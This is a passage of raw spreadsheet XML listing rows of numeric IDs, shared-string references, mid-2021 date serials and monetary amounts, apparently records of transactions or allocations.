    <row r="4992" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4992">
        <v>26001</v>
      </c>
      <c r="B4992">
        <v>5799</v>
      </c>
      <c r="C4992" t="s">
        <v>9351</v>
      </c>
      <c r="D4992" t="s">
        <v>14125</v>
      </c>
      <c r="E4992">
        <v>32</v>
      </c>
      <c r="F4992" t="s">
        <v>4686</v>
      </c>
      <c r="G4992" s="1">
        <v>44358</v>
      </c>
      <c r="H4992">
        <v>300000</v>
      </c>
      <c r="I4992" t="s">
        <v>14126</v>
      </c>
      <c r="J4992" t="s">
        <v>14127</v>
      </c>
    </row>
    <row r="4993" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4993">
        <v>26003</v>
      </c>
      <c r="B4993">
        <v>1745</v>
      </c>
      <c r="C4993" t="s">
        <v>6529</v>
      </c>
      <c r="D4993" t="s">
        <v>13755</v>
      </c>
      <c r="E4993">
        <v>16</v>
      </c>
      <c r="F4993" t="s">
        <v>1746</v>
      </c>
      <c r="G4993" s="1">
        <v>44365</v>
      </c>
      <c r="H4993">
        <v>400000</v>
      </c>
      <c r="I4993" t="s">
        <v>14131</v>
      </c>
    </row>
    <row r="4994" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4994">
        <v>26004</v>
      </c>
      <c r="B4994">
        <v>1745</v>
      </c>
      <c r="C4994" t="s">
        <v>6529</v>
      </c>
      <c r="D4994" t="s">
        <v>13755</v>
      </c>
      <c r="E4994">
        <v>16</v>
      </c>
      <c r="F4994" t="s">
        <v>9561</v>
      </c>
      <c r="G4994" s="1">
        <v>44365</v>
      </c>
      <c r="H4994">
        <v>200000</v>
      </c>
      <c r="I4994" t="s">
        <v>14132</v>
      </c>
    </row>
    <row r="4995" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4995">
        <v>26016</v>
      </c>
      <c r="B4995">
        <v>5800</v>
      </c>
      <c r="C4995" t="s">
        <v>9365</v>
      </c>
      <c r="D4995" t="s">
        <v>14133</v>
      </c>
      <c r="E4995">
        <v>2</v>
      </c>
      <c r="F4995" t="s">
        <v>14134</v>
      </c>
      <c r="G4995" s="1">
        <v>44363</v>
      </c>
      <c r="H4995">
        <v>1000</v>
      </c>
      <c r="I4995" t="s">
        <v>14135</v>
      </c>
      <c r="J4995" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="4996" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4996">
        <v>26017</v>
      </c>
      <c r="B4996">
        <v>5800</v>
      </c>
      <c r="C4996" t="s">
        <v>9365</v>
      </c>
      <c r="D4996" t="s">
        <v>14133</v>
      </c>
      <c r="E4996">
        <v>2</v>
      </c>
      <c r="F4996" t="s">
        <v>14136</v>
      </c>
      <c r="G4996" s="1">
        <v>44363</v>
      </c>
      <c r="H4996">
        <v>10000</v>
      </c>
      <c r="I4996" t="s">
        <v>14137</v>
      </c>
      <c r="J4996" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="4997" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4997">
        <v>26018</v>
      </c>
      <c r="B4997">
        <v>5800</v>
      </c>
      <c r="C4997" t="s">
        <v>9365</v>
      </c>
      <c r="D4997" t="s">
        <v>14133</v>
      </c>
      <c r="E4997">
        <v>2</v>
      </c>
      <c r="F4997" t="s">
        <v>3814</v>
      </c>
      <c r="G4997" s="1">
        <v>44363</v>
      </c>
      <c r="H4997">
        <v>100000</v>
      </c>
    </row>
    <row r="4998" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4998">
        <v>26019</v>
      </c>
      <c r="B4998">
        <v>5800</v>
      </c>
      <c r="C4998" t="s">
        <v>9365</v>
      </c>
      <c r="D4998" t="s">
        <v>14133</v>
      </c>
      <c r="E4998">
        <v>2</v>
      </c>
      <c r="F4998" t="s">
        <v>9527</v>
      </c>
      <c r="G4998" s="1">
        <v>44363</v>
      </c>
      <c r="H4998">
        <v>100000</v>
      </c>
      <c r="I4998" t="s">
        <v>14138</v>
      </c>
      <c r="J4998" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="4999" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4999">
        <v>26020</v>
      </c>
      <c r="B4999">
        <v>5800</v>
      </c>
      <c r="C4999" t="s">
        <v>9365</v>
      </c>
      <c r="D4999" t="s">
        <v>14133</v>
      </c>
      <c r="E4999">
        <v>2</v>
      </c>
      <c r="F4999" t="s">
        <v>11963</v>
      </c>
      <c r="G4999" s="1">
        <v>44363</v>
      </c>
      <c r="H4999">
        <v>100000</v>
      </c>
      <c r="I4999" t="s">
        <v>14138</v>
      </c>
      <c r="J4999" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="5000" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5000">
        <v>26021</v>
      </c>
      <c r="B5000">
        <v>5800</v>
      </c>
      <c r="C5000" t="s">
        <v>9365</v>
      </c>
      <c r="D5000" t="s">
        <v>14133</v>
      </c>
      <c r="E5000">
        <v>2</v>
      </c>
      <c r="F5000" t="s">
        <v>9928</v>
      </c>
      <c r="G5000" s="1">
        <v>44363</v>
      </c>
      <c r="H5000">
        <v>100000</v>
      </c>
      <c r="I5000" t="s">
        <v>14137</v>
      </c>
      <c r="J5000" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="5001" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5001">
        <v>26025</v>
      </c>
      <c r="B5001">
        <v>5686</v>
      </c>
      <c r="C5001" t="s">
        <v>9359</v>
      </c>
      <c r="D5001" t="s">
        <v>14139</v>
      </c>
      <c r="E5001">
        <v>12</v>
      </c>
      <c r="F5001" t="s">
        <v>14140</v>
      </c>
      <c r="G5001" s="1">
        <v>44369</v>
      </c>
      <c r="H5001">
        <v>150000</v>
      </c>
      <c r="I5001" t="s">
        <v>14141</v>
      </c>
      <c r="J5001" t="s">
        <v>14142</v>
      </c>
    </row>
    <row r="5002" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5002">
        <v>26026</v>
      </c>
      <c r="B5002">
        <v>5768</v>
      </c>
      <c r="C5002" t="s">
        <v>9373</v>
      </c>
      <c r="D5002" t="s">
        <v>14143</v>
      </c>
      <c r="E5002">
        <v>12</v>
      </c>
      <c r="F5002" t="s">
        <v>14144</v>
      </c>
      <c r="G5002" s="1">
        <v>44369</v>
      </c>
      <c r="H5002">
        <v>150000</v>
      </c>
      <c r="I5002" t="s">
        <v>14145</v>
      </c>
      <c r="J5002" t="s">
        <v>14146</v>
      </c>
    </row>
    <row r="5003" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5003">
        <v>26050</v>
      </c>
      <c r="B5003">
        <v>5700</v>
      </c>
      <c r="C5003" t="s">
        <v>7012</v>
      </c>
      <c r="D5003" t="s">
        <v>14147</v>
      </c>
      <c r="E5003">
        <v>26</v>
      </c>
      <c r="F5003" t="s">
        <v>1746</v>
      </c>
      <c r="G5003" s="1">
        <v>44378</v>
      </c>
      <c r="H5003">
        <v>4200181</v>
      </c>
      <c r="I5003" t="s">
        <v>9536</v>
      </c>
      <c r="J5003" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="5004" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5004">
        <v>26059</v>
      </c>
      <c r="B5004">
        <v>1033</v>
      </c>
      <c r="C5004" t="s">
        <v>2603</v>
      </c>
      <c r="D5004" t="s">
        <v>14148</v>
      </c>
      <c r="E5004">
        <v>2</v>
      </c>
      <c r="F5004" t="s">
        <v>14149</v>
      </c>
      <c r="G5004" s="1">
        <v>44368</v>
      </c>
      <c r="H5004">
        <v>1000000</v>
      </c>
      <c r="I5004" t="s">
        <v>14150</v>
      </c>
    </row>
    <row r="5005" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5005">
        <v>26060</v>
      </c>
      <c r="B5005">
        <v>1033</v>
      </c>
      <c r="C5005" t="s">
        <v>2603</v>
      </c>
      <c r="D5005" t="s">
        <v>14148</v>
      </c>
      <c r="E5005">
        <v>2</v>
      </c>
      <c r="F5005" t="s">
        <v>14151</v>
      </c>
      <c r="G5005" s="1">
        <v>44368</v>
      </c>
      <c r="H5005">
        <v>1200000</v>
      </c>
      <c r="I5005" t="s">
        <v>14152</v>
      </c>
      <c r="J5005" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="5006" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5006">
        <v>26061</v>
      </c>
      <c r="B5006">
        <v>1033</v>
      </c>
      <c r="C5006" t="s">
        <v>2603</v>
      </c>
      <c r="D5006" t="s">
        <v>14148</v>
      </c>
      <c r="E5006">
        <v>2</v>
      </c>
      <c r="F5006" t="s">
        <v>9437</v>
      </c>
      <c r="G5006" s="1">
        <v>44368</v>
      </c>
      <c r="H5006">
        <v>500000</v>
      </c>
      <c r="I5006" t="s">
        <v>14152</v>
      </c>
      <c r="J5006" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="5007" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5007">
        <v>26062</v>
      </c>
      <c r="B5007">
        <v>1033</v>
      </c>
      <c r="C5007" t="s">
        <v>2603</v>
      </c>
      <c r="D5007" t="s">
        <v>14148</v>
      </c>
      <c r="E5007">
        <v>2</v>
      </c>
      <c r="F5007" t="s">
        <v>9941</v>
      </c>
      <c r="G5007" s="1">
        <v>44368</v>
      </c>
      <c r="H5007">
        <v>250000</v>
      </c>
      <c r="I5007" t="s">
        <v>14152</v>
      </c>
      <c r="J5007" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="5008" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5008">
        <v>26063</v>
      </c>
      <c r="B5008">
        <v>1072</v>
      </c>
      <c r="C5008" t="s">
        <v>3951</v>
      </c>
      <c r="D5008" t="s">
        <v>14153</v>
      </c>
      <c r="E5008">
        <v>2</v>
      </c>
      <c r="F5008" t="s">
        <v>14154</v>
      </c>
      <c r="G5008" s="1">
        <v>44368</v>
      </c>
      <c r="H5008">
        <v>1000000</v>
      </c>
      <c r="I5008" t="s">
        <v>14155</v>
      </c>
    </row>
    <row r="5009" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5009">
        <v>26064</v>
      </c>
      <c r="B5009">
        <v>1312</v>
      </c>
      <c r="C5009" t="s">
        <v>4043</v>
      </c>
      <c r="D5009" t="s">
        <v>14078</v>
      </c>
      <c r="E5009">
        <v>13</v>
      </c>
      <c r="F5009" t="s">
        <v>14156</v>
      </c>
      <c r="G5009" s="1">
        <v>44371</v>
      </c>
      <c r="H5009">
        <v>900000</v>
      </c>
      <c r="I5009" t="s">
        <v>14080</v>
      </c>
    </row>
    <row r="5010" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5010">
        <v>26065</v>
      </c>
      <c r="B5010">
        <v>1312</v>
      </c>
      <c r="C5010" t="s">
        <v>4043</v>
      </c>
      <c r="D5010" t="s">
        <v>14078</v>
      </c>
      <c r="E5010">
        <v>13</v>
      </c>
      <c r="F5010" t="s">
        <v>8913</v>
      </c>
      <c r="G5010" s="1">
        <v>44371</v>
      </c>
      <c r="H5010">
        <v>400000</v>
      </c>
      <c r="I5010" t="s">
        <v>14080</v>
      </c>
    </row>
    <row r="5011" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5011">
        <v>26077</v>
      </c>
      <c r="B5011">
        <v>379</v>
      </c>
      <c r="C5011" t="s">
        <v>890</v>
      </c>
      <c r="D5011" t="s">
        <v>14033</v>
      </c>
      <c r="E5011">
        <v>12</v>
      </c>
      <c r="F5011" t="s">
        <v>10581</v>
      </c>
      <c r="G5011" s="1">
        <v>44357</v>
      </c>
      <c r="H5011">
        <v>50000</v>
      </c>
      <c r="I5011" t="s">
        <v>9550</v>
      </c>
      <c r="J5011" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="5012" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5012">
        <v>26095</v>
      </c>
      <c r="B5012">
        <v>5106</v>
      </c>
      <c r="C5012" t="s">
        <v>8935</v>
      </c>
      <c r="D5012" t="s">
        <v>14157</v>
      </c>
      <c r="E5012">
        <v>29</v>
      </c>
      <c r="F5012" t="s">
        <v>10840</v>
      </c>
      <c r="G5012" s="1">
        <v>44368</v>
      </c>
      <c r="H5012">
        <v>600000</v>
      </c>
      <c r="I5012" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="5013" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5013">
        <v>26187</v>
      </c>
      <c r="B5013">
        <v>5774</v>
      </c>
      <c r="C5013" t="s">
        <v>9323</v>
      </c>
      <c r="D5013" t="s">
        <v>14112</v>
      </c>
      <c r="E5013">
        <v>26</v>
      </c>
      <c r="F5013" t="s">
        <v>3462</v>
      </c>
      <c r="G5013" s="1">
        <v>44369</v>
      </c>
      <c r="H5013">
        <v>1200000</v>
      </c>
      <c r="I5013" t="s">
        <v>14158</v>
      </c>
      <c r="J5013" t="s">
        <v>14113</v>
      </c>
    </row>
    <row r="5014" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5014">
        <v>26225</v>
      </c>
      <c r="B5014">
        <v>1522</v>
      </c>
      <c r="C5014" t="s">
        <v>4691</v>
      </c>
      <c r="D5014" t="s">
        <v>14159</v>
      </c>
      <c r="E5014">
        <v>12</v>
      </c>
      <c r="F5014" t="s">
        <v>9527</v>
      </c>
      <c r="G5014" s="1">
        <v>44378</v>
      </c>
      <c r="H5014">
        <v>1000</v>
      </c>
      <c r="J5014" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5015" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5015">
        <v>26226</v>
      </c>
      <c r="B5015">
        <v>1522</v>
      </c>
      <c r="C5015" t="s">
        <v>4691</v>
      </c>
      <c r="D5015" t="s">
        <v>14159</v>
      </c>
      <c r="E5015">
        <v>12</v>
      </c>
      <c r="F5015" t="s">
        <v>9928</v>
      </c>
      <c r="G5015" s="1">
        <v>44378</v>
      </c>
      <c r="H5015">
        <v>100000</v>
      </c>
      <c r="J5015" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5016" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5016">
        <v>26227</v>
      </c>
      <c r="B5016">
        <v>1522</v>
      </c>
      <c r="C5016" t="s">
        <v>4691</v>
      </c>
      <c r="D5016" t="s">
        <v>14159</v>
      </c>
      <c r="E5016">
        <v>12</v>
      </c>
      <c r="F5016" t="s">
        <v>14160</v>
      </c>
      <c r="G5016" s="1">
        <v>44378</v>
      </c>
      <c r="H5016">
        <v>1000000</v>
      </c>
      <c r="J5016" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5017" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5017">
        <v>26228</v>
      </c>
      <c r="B5017">
        <v>1522</v>
      </c>
      <c r="C5017" t="s">
        <v>4691</v>
      </c>
      <c r="D5017" t="s">
        <v>14159</v>
      </c>
      <c r="E5017">
        <v>12</v>
      </c>
      <c r="F5017" t="s">
        <v>9675</v>
      </c>
      <c r="G5017" s="1">
        <v>44378</v>
      </c>
      <c r="H5017">
        <v>100000</v>
      </c>
      <c r="J5017" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5018" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5018">
        <v>26229</v>
      </c>
      <c r="B5018">
        <v>1522</v>
      </c>
      <c r="C5018" t="s">
        <v>4691</v>
      </c>
      <c r="D5018" t="s">
        <v>14159</v>
      </c>
      <c r="E5018">
        <v>12</v>
      </c>
      <c r="F5018" t="s">
        <v>14161</v>
      </c>
      <c r="G5018" s="1">
        <v>44378</v>
      </c>
      <c r="H5018">
        <v>100000</v>
      </c>
    </row>
    <row r="5019" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5019">
        <v>26230</v>
      </c>
      <c r="B5019">
        <v>1522</v>
      </c>
      <c r="C5019" t="s">
        <v>4691</v>
      </c>
      <c r="D5019" t="s">
        <v>14159</v>
      </c>
      <c r="E5019">
        <v>12</v>
      </c>
      <c r="F5019" t="s">
        <v>9674</v>
      </c>
      <c r="G5019" s="1">
        <v>44378</v>
      </c>
      <c r="H5019">
        <v>100000</v>
      </c>
      <c r="J5019" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5020" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5020">
        <v>26231</v>
      </c>
      <c r="B5020">
        <v>1522</v>
      </c>
      <c r="C5020" t="s">
        <v>4691</v>
      </c>
      <c r="D5020" t="s">
        <v>14159</v>
      </c>
      <c r="E5020">
        <v>12</v>
      </c>
      <c r="F5020" t="s">
        <v>3814</v>
      </c>
      <c r="G5020" s="1">
        <v>44378</v>
      </c>
      <c r="H5020">
        <v>1000000</v>
      </c>
      <c r="J5020" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5021" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5021">
        <v>26232</v>
      </c>
      <c r="B5021">
        <v>1522</v>
      </c>
      <c r="C5021" t="s">
        <v>4691</v>
      </c>
      <c r="D5021" t="s">
        <v>14159</v>
      </c>
      <c r="E5021">
        <v>12</v>
      </c>
      <c r="F5021" t="s">
        <v>4686</v>
      </c>
      <c r="G5021" s="1">
        <v>44378</v>
      </c>
      <c r="H5021">
        <v>100000</v>
      </c>
      <c r="J5021" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5022" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5022">
        <v>26233</v>
      </c>
      <c r="B5022">
        <v>1522</v>
      </c>
      <c r="C5022" t="s">
        <v>4691</v>
      </c>
      <c r="D5022" t="s">
        <v>14159</v>
      </c>
      <c r="E5022">
        <v>12</v>
      </c>
      <c r="F5022" t="s">
        <v>9437</v>
      </c>
      <c r="G5022" s="1">
        <v>44378</v>
      </c>
      <c r="H5022">
        <v>1000000</v>
      </c>
      <c r="J5022" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5023" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5023">
        <v>26234</v>
      </c>
      <c r="B5023">
        <v>1522</v>
      </c>
      <c r="C5023" t="s">
        <v>4691</v>
      </c>
      <c r="D5023" t="s">
        <v>14159</v>
      </c>
      <c r="E5023">
        <v>12</v>
      </c>
      <c r="F5023" t="s">
        <v>9595</v>
      </c>
      <c r="G5023" s="1">
        <v>44378</v>
      </c>
      <c r="H5023">
        <v>1000000</v>
      </c>
      <c r="J5023" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5024" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5024">
        <v>26236</v>
      </c>
      <c r="B5024">
        <v>1522</v>
      </c>
      <c r="C5024" t="s">
        <v>4691</v>
      </c>
      <c r="D5024" t="s">
        <v>14159</v>
      </c>
      <c r="E5024">
        <v>12</v>
      </c>
      <c r="F5024" t="s">
        <v>12059</v>
      </c>
      <c r="G5024" s="1">
        <v>44378</v>
      </c>
      <c r="H5024">
        <v>1000000</v>
      </c>
      <c r="J5024" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5025" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5025">
        <v>26237</v>
      </c>
      <c r="B5025">
        <v>1522</v>
      </c>
      <c r="C5025" t="s">
        <v>4691</v>
      </c>
      <c r="D5025" t="s">
        <v>14159</v>
      </c>
      <c r="E5025">
        <v>12</v>
      </c>
      <c r="F5025" t="s">
        <v>14162</v>
      </c>
      <c r="G5025" s="1">
        <v>44378</v>
      </c>
      <c r="H5025">
        <v>1000000</v>
      </c>
      <c r="J5025" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5026" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5026">
        <v>26238</v>
      </c>
      <c r="B5026">
        <v>1522</v>
      </c>
      <c r="C5026" t="s">
        <v>4691</v>
      </c>
      <c r="D5026" t="s">
        <v>14159</v>
      </c>
      <c r="E5026">
        <v>12</v>
      </c>
      <c r="F5026" t="s">
        <v>9460</v>
      </c>
      <c r="G5026" s="1">
        <v>44378</v>
      </c>
      <c r="H5026">
        <v>100000</v>
      </c>
      <c r="J5026" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5027" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5027">
        <v>26239</v>
      </c>
      <c r="B5027">
        <v>1522</v>
      </c>
      <c r="C5027" t="s">
        <v>4691</v>
      </c>
      <c r="D5027" t="s">
        <v>14159</v>
      </c>
      <c r="E5027">
        <v>12</v>
      </c>
      <c r="F5027" t="s">
        <v>11754</v>
      </c>
      <c r="G5027" s="1">
        <v>44378</v>
      </c>
      <c r="H5027">
        <v>1000000</v>
      </c>
      <c r="J5027" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5028" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5028">
        <v>26240</v>
      </c>
      <c r="B5028">
        <v>1522</v>
      </c>
      <c r="C5028" t="s">
        <v>4691</v>
      </c>
      <c r="D5028" t="s">
        <v>14159</v>
      </c>
      <c r="E5028">
        <v>12</v>
      </c>
      <c r="F5028" t="s">
        <v>9523</v>
      </c>
      <c r="G5028" s="1">
        <v>44378</v>
      </c>
      <c r="H5028">
        <v>1000000</v>
      </c>
      <c r="J5028" t="s">
        <v>14163</v>
      </c>
    </row>
    <row r="5029" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5029">
        <v>26241</v>
      </c>
      <c r="B5029">
        <v>1522</v>
      </c>
      <c r="C5029" t="s">
        <v>4691</v>
      </c>
      <c r="D5029" t="s">
        <v>14159</v>
      </c>
      <c r="E5029">
        <v>12</v>
      </c>
      <c r="F5029" t="s">
        <v>9435</v>
      </c>
      <c r="G5029" s="1">
        <v>44378</v>
      </c>
      <c r="H5029">
        <v>1000000</v>
      </c>
      <c r="J5029" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5030" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5030">
        <v>26242</v>
      </c>
      <c r="B5030">
        <v>1522</v>
      </c>
      <c r="C5030" t="s">
        <v>4691</v>
      </c>
      <c r="D5030" t="s">
        <v>14159</v>
      </c>
      <c r="E5030">
        <v>12</v>
      </c>
      <c r="F5030" t="s">
        <v>14164</v>
      </c>
      <c r="G5030" s="1">
        <v>44378</v>
      </c>
      <c r="H5030">
        <v>1000000</v>
      </c>
      <c r="J5030" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5031" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5031">
        <v>26243</v>
      </c>
      <c r="B5031">
        <v>1522</v>
      </c>
      <c r="C5031" t="s">
        <v>4691</v>
      </c>
      <c r="D5031" t="s">
        <v>14159</v>
      </c>
      <c r="E5031">
        <v>12</v>
      </c>
      <c r="F5031" t="s">
        <v>9846</v>
      </c>
      <c r="G5031" s="1">
        <v>44378</v>
      </c>
      <c r="H5031">
        <v>1000000</v>
      </c>
      <c r="J5031" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5032" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5032">
        <v>26244</v>
      </c>
      <c r="B5032">
        <v>1522</v>
      </c>
      <c r="C5032" t="s">
        <v>4691</v>
      </c>
      <c r="D5032" t="s">
        <v>14159</v>
      </c>
      <c r="E5032">
        <v>12</v>
      </c>
      <c r="F5032" t="s">
        <v>9459</v>
      </c>
      <c r="G5032" s="1">
        <v>44378</v>
      </c>
      <c r="H5032">
        <v>1000000</v>
      </c>
      <c r="J5032" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5033" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5033">
        <v>26245</v>
      </c>
      <c r="B5033">
        <v>1522</v>
      </c>
      <c r="C5033" t="s">
        <v>4691</v>
      </c>
      <c r="D5033" t="s">
        <v>14159</v>
      </c>
      <c r="E5033">
        <v>12</v>
      </c>
      <c r="F5033" t="s">
        <v>1746</v>
      </c>
      <c r="G5033" s="1">
        <v>44378</v>
      </c>
      <c r="H5033">
        <v>1000000</v>
      </c>
      <c r="J5033" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5034" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5034">
        <v>26246</v>
      </c>
      <c r="B5034">
        <v>1522</v>
      </c>
      <c r="C5034" t="s">
        <v>4691</v>
      </c>
      <c r="D5034" t="s">
        <v>14159</v>
      </c>
      <c r="E5034">
        <v>12</v>
      </c>
      <c r="F5034" t="s">
        <v>10130</v>
      </c>
      <c r="G5034" s="1">
        <v>44378</v>
      </c>
      <c r="H5034">
        <v>1000000</v>
      </c>
      <c r="J5034" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5035" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5035">
        <v>26247</v>
      </c>
      <c r="B5035">
        <v>1522</v>
      </c>
      <c r="C5035" t="s">
        <v>4691</v>
      </c>
      <c r="D5035" t="s">
        <v>14159</v>
      </c>
      <c r="E5035">
        <v>12</v>
      </c>
      <c r="F5035" t="s">
        <v>2236</v>
      </c>
      <c r="G5035" s="1">
        <v>44378</v>
      </c>
      <c r="H5035">
        <v>1000000</v>
      </c>
      <c r="J5035" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5036" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5036">
        <v>26249</v>
      </c>
      <c r="B5036">
        <v>1522</v>
      </c>
      <c r="C5036" t="s">
        <v>4691</v>
      </c>
      <c r="D5036" t="s">
        <v>14159</v>
      </c>
      <c r="E5036">
        <v>12</v>
      </c>
      <c r="F5036" t="s">
        <v>9577</v>
      </c>
      <c r="G5036" s="1">
        <v>44378</v>
      </c>
      <c r="H5036">
        <v>10000</v>
      </c>
      <c r="J5036" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="5037" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5037">
        <v>26250</v>
      </c>
      <c r="B5037">
        <v>5620</v>
      </c>
      <c r="C5037" t="s">
        <v>9316</v>
      </c>
      <c r="D5037" t="s">
        <v>14165</v>
      </c>
      <c r="E5037">
        <v>34</v>
      </c>
      <c r="F5037" t="s">
        <v>14166</v>
      </c>
      <c r="G5037" s="1">
        <v>44369</v>
      </c>
      <c r="I5037" t="s">
        <v>9536</v>
      </c>
      <c r="J5037" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="5038" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5038">
        <v>26251</v>
      </c>
      <c r="B5038">
        <v>5620</v>
      </c>
      <c r="C5038" t="s">
        <v>9316</v>
      </c>
      <c r="D5038" t="s">
        <v>14165</v>
      </c>
      <c r="E5038">
        <v>34</v>
      </c>
      <c r="F5038" t="s">
        <v>14167</v>
      </c>
      <c r="G5038" s="1">
        <v>44369</v>
      </c>
      <c r="I5038" t="s">
        <v>9536</v>
      </c>
      <c r="J5038" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="5039" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5039">
        <v>26252</v>
      </c>
      <c r="B5039">
        <v>5620</v>
      </c>
      <c r="C5039" t="s">
        <v>9316</v>
      </c>
      <c r="D5039" t="s">
        <v>14165</v>
      </c>
      <c r="E5039">
        <v>34</v>
      </c>
      <c r="F5039" t="s">
        <v>1746</v>
      </c>
      <c r="G5039" s="1">
        <v>44369</v>
      </c>
      <c r="I5039" t="s">
        <v>9536</v>
      </c>
      <c r="J5039" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="5040" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5040">
        <v>26253</v>
      </c>
      <c r="B5040">
        <v>5620</v>
      </c>
      <c r="C5040" t="s">
        <v>9316</v>
      </c>
      <c r="D5040" t="s">
        <v>14165</v>
      </c>
      <c r="E5040">
        <v>34</v>
      </c>
      <c r="F5040" t="s">
        <v>9928</v>
      </c>
      <c r="G5040" s="1">
        <v>44369</v>
      </c>
      <c r="I5040" t="s">
        <v>9536</v>
      </c>
      <c r="J5040" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="5041" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5041">
        <v>26272</v>
      </c>
      <c r="B5041">
        <v>5686</v>
      </c>
      <c r="C5041" t="s">
        <v>9359</v>
      </c>
      <c r="D5041" t="s">
        <v>14139</v>
      </c>
      <c r="E5041">
        <v>12</v>
      </c>
      <c r="F5041" t="s">
        <v>14168</v>
      </c>
      <c r="G5041" s="1">
        <v>44369</v>
      </c>
      <c r="H5041">
        <v>150000</v>
      </c>
      <c r="I5041" t="s">
        <v>14145</v>
      </c>
      <c r="J5041" t="s">
        <v>14169</v>
      </c>
    </row>
    <row r="5042" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5042">
        <v>26273</v>
      </c>
      <c r="B5042">
        <v>5686</v>
      </c>
      <c r="C5042" t="s">
        <v>9359</v>
      </c>
      <c r="D5042" t="s">
        <v>14139</v>
      </c>
      <c r="E5042">
        <v>12</v>
      </c>
      <c r="F5042" t="s">
        <v>9561</v>
      </c>
      <c r="G5042" s="1">
        <v>44369</v>
      </c>
      <c r="H5042">
        <v>50000</v>
      </c>
      <c r="I5042" t="s">
        <v>14145</v>
      </c>
      <c r="J5042" t="s">
        <v>14169</v>
      </c>
    </row>
    <row r="5043" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A5043">
        <v>26274</v>
      </c>
      <c r="B5043">
        <v>5686</v>
      </c>
      <c r="C5043" t="s">
        <v>9359</v>
      </c>
      <c r="D5043" t="s">
        <v>14139</v>
      </c>
      <c r="E5043">
        <v>12</v>
      </c>
      <c r="F5043" t="s">
        <v>8913</v>
      </c>
      <c r="G5043" s="1">
        <v>44369</v>
      </c>
      <c r="H5043">
        <v>50000</v>
      </c>
      <c r="I5043" t="s">
        <v>14145</v>
      </c>
    </row>
